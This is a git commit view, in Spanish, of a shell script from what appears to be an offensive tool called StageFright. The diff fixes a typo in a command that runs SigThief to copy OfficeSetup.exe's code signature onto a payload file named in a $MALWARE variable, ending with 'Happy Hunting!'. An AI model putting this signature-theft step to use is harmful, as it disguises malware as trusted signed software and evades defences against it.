Explorar el Código

Update TCP.sh

assume-breach hace 2 años
padre
commit
ce7000887b
Se han modificado 1 ficheros con 1 adiciones y 1 borrados
  1. 1 1
      StageFright/StageFright/StageFright/TCP/TCP.sh

+ 1 - 1
StageFright/StageFright/StageFright/TCP/TCP.sh

@@ -180,7 +180,7 @@ sleep 2
 echo -e ${yellow}"+++Adding Binary Signature+++"${clear}
 echo ""
 sleep 2
-python3 python3 StageFright/Resources/SigThief/sigthief.py -i StageFright/Resources/OfficeSetup.exe-t $MALWARE -o signed$MALWARE >/dev/null 2>&1
+python3 StageFright/Resources/SigThief/sigthief.py -i StageFright/Resources/OfficeSetup.exe-t $MALWARE -o signed$MALWARE >/dev/null 2>&1
 mv signed$MALWARE $MALWARE
 echo -e ${yellow}"***Signature Added. Happy Hunting!**"${clear}
 echo ""